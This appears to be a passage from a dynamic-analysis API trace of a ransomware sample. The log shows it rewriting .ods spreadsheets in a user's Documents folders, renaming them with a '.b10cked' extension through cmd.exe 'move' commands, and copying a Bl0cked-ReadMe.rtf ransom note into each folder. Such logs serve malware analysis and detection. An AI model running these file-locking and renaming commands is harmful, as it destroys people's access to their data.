lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39435, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a0d [0137.642] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a0b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iu1VEIcz.ods", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iu1VEIcz.ods", cchWideChar=12, lpMultiByteStr=0x131324c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iu1VEIcz.ods", lpUsedDefaultChar=0x0) returned 12 [0137.646] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13418 [0137.646] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.646] CloseHandle (hObject=0x114) returned 1 [0137.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods") returned 0x34 [0137.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.647] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xde4, dwThreadId=0xd98)) returned 1 [0137.841] CloseHandle (hObject=0x110) returned 1 [0137.841] CloseHandle (hObject=0x114) 
returned 1 [0137.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.842] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0137.842] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.842] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.842] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.842] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.842] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.842] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE 
\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.842] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.843] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe8c, dwThreadId=0xd94)) returned 1 [0137.855] CloseHandle (hObject=0x110) returned 1 [0137.855] CloseHandle (hObject=0x114) returned 1 [0137.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0137.856] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.856] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.856] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 
1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.856] ReleaseMutex (hMutex=0xf8) returned 1 [0137.856] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\vbknjiyz39y.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19464553699) returned 1 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.857] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1481c [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.858] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14334 [0137.858] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.858] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1481c [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1481c [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.859] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa40d, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa40d, lpOverlapped=0x0) returned 1 [0137.859] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.859] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa40d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa40d, lpOverlapped=0x0) returned 1 [0137.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41997, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40f [0137.860] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa40d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa40d, lpOverlapped=0x0) returned 1 [0137.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=-41997, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40f [0137.860] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa40d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa40d, lpOverlapped=0x0) returned 1 [0137.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBKNjIyz39y.ods", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBKNjIyz39y.ods", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBKNjIyz39y.ods", lpUsedDefaultChar=0x0) returned 15 [0137.864] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1481c [0137.864] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.864] CloseHandle (hObject=0x114) returned 1 [0137.865] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\VBKNjIyz39y.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS") returned 0x2f [0137.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0137.866] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdbc, dwThreadId=0xde0)) returned 1 [0137.876] CloseHandle (hObject=0x110) returned 1 [0137.876] CloseHandle (hObject=0x114) returned 1 [0137.876] CharUpperBuffW (in: 
lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.876] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 3 [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0137.876] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.876] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.876] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.876] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.876] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.876] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0137.877] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE 
\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.877] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.877] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd90, dwThreadId=0xda8)) returned 1 [0138.028] CloseHandle (hObject=0x110) returned 1 [0138.028] CloseHandle (hObject=0x114) returned 1 [0138.028] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0138.028] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.028] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.028] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.028] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.028] ReleaseMutex (hMutex=0xf8) 
